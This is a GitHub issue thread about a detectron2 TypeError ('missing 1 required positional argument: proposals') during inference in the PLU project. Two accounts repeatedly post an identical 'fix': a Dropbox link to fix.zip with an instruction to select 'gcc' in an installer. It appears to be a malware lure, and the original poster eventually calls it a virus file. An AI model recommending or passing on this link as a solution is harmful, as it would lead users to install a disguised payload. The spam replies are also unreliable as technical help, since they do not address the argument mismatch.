### ISSUE TITLE
TypeError: forward() missing 1 required positional argument: 'proposals'

### ISSUE THREAD

**Issue by GitHubAaronhuang** [lxycopper/PLU#6]
Traceback (most recent call last):
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 59, in _wrap
    fn(i, *args)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/engine/launch.py", line 94, in _distributed_worker
    main_func(*args)
  File "/home/mrp/hyy/OWOD/PLU/tools/train_net.py", line 139, in main
    res = Trainer.test(cfg, model)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/engine/defaults.py", line 525, in test
    results_i = inference_on_dataset(model, data_loader, evaluator)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/evaluation/evaluator.py", line 141, in inference_on_dataset
    outputs = model(inputs)
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1051, in _call_impl
    return forward_call(*input, **kwargs)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/modeling/meta_arch/rcnn.py", line 151, in forward
    return self.inference(batched_inputs)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/modeling/meta_arch/rcnn.py", line 221, in inference
    results, _ = self.roi_heads(images, features, proposals, targets=None, device=self.device)
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1051, in _call_impl
    return forward_call(*input, **kwargs)
TypeError: forward() missing 1 required positional argument: 'proposals'

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GitHubAaronhuang** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

This is a parameter mismatch problem, it has nothing to do with gcc?

**Comment by GitHubAaronhuang** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

This is a parameter mismatch problem, it has nothing to do with gcc?

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GitHubAaronhuang** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

This is a virus file

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
